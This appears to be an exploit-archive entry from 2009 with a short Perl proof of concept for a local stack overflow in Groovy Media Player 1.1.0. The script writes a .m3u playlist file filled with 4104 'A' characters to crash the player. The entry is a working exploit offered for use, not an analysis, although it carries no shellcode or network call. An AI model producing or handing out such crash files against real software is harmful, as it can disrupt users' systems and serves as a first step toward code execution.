id: 6832
date: 04/19/2009
title: Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC
author: GoLd_M
cves: 

==============================================================
Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC
==============================================================



my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";



#  0day.today [2023-03-22]  #